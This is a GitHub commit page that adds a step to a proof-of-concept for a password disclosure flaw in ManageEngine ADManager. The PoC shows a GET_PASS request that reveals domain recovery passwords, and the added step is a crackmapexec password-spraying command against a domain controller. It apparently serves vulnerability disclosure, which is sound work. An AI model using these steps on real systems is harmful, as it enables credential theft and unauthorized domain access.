Skip to content

Commit

Permalink
Update admanager-recovery-password-disclosure.md
Browse files Browse the repository at this point in the history
  • Loading branch information
@passtheticket
passtheticket authored Nov 14, 2023
1 parent bb88bc3 commit a51f085
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion manage-engine-apps/admanager-recovery-password-disclosure.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,4 +7,5 @@ Proof of Concept
2. Go to the URL https://target/ConfigureRecoverySettings/GET_PASS?req={"domainId"%3A"1"}
![alt text](https://github.com/passtheticket/vulnerability-research/blob/main/screenshots/manage_engine/14.PNG)
3. The password of other domains (if it is set) can be viewed changing req parameter value such as {"domainId":"2"}

4. We can conduct password spraying to inspect restored account if the password is not changed after the account restoration.
```crackmapexec smb <target-DC> -u users.txt -p unsafe.local@2023 --continue-on-success```

0 comments on commit a51f085

Please sign in to comment.